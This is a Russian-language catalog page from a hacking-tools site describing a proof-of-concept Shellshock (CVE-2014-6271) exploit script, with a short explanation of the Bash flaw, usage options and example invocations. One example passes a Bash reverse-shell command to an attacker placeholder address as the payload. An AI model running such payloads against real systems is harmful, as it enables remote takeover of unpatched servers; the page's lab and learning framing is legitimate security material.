Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2014-6271-Shellshock — CVE-2014-6271 Exploit | by infrar3d | Kitploit
Инструменты/GitHubGitHub/industri4l-h3ll-xpl0it3rs/cve-2014-6271-shellshock
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & Education
GitHubindustri4l-h3ll-xpl0it3rs/cve-2014-6271-shellshock

CVE-2014-6271-Shellshock

CVE-2014-6271 Exploit | by infrar3d

Репозиторий

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
5 месяцев назадЕщё не проверено

CVE-2014-6271 Shellshock

Эксплойт от infrar3d

Этот репозиторий содержит proof-of-concept эксплойт для CVE-2014-6271 (Shellshock).

Shellshock — это критическая уязвимость в GNU Bash, при которой специально созданные переменные окружения позволяют выполнять произвольные команды.
Когда веб-сервер передаёт HTTP-заголовки в CGI-скрипты, вызывающие Bash, злоумышленник может внедрять команды через эти заголовки.

Использование:

root@kitploit:~
./shellshock_exp.sh -h                                        
shellshock_exp.sh [options]

Options:
	-h | --help	print this message and exit
	-a | --address	target address (default is "localhost")
	-p | --port	target port (default is 80)
	-f | --file	target file (default is "/cgi-bin/shell.sh")
	-c | --command	command to execute on the target machine (default is "id")

Примеры:

root@kitploit:~
./shellshock_exp.sh -a 192.168.1.10

./shellshock_exp.sh -a 192.168.1.10 -c "bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1"

(протестировано на машине VulnHub «Hacksudo - Thor»)

⚠️ Отказ от ответственности ⚠️

Данное программное обеспечение и proof-of-concept код предоставляются только в образовательных и исследовательских целях.

  • Авторы не несут ответственности за любое неправомерное использование или ущерб, причинённый этой программой.
  • Не используйте против любых систем без явного предварительного разрешения.
  • Использование этих инструментов для атаки на цели без согласия незаконно.

Вы несёте ответственность за соблюдение всех применимых законов. Используйте этично и ответственно.

Скачать инструмент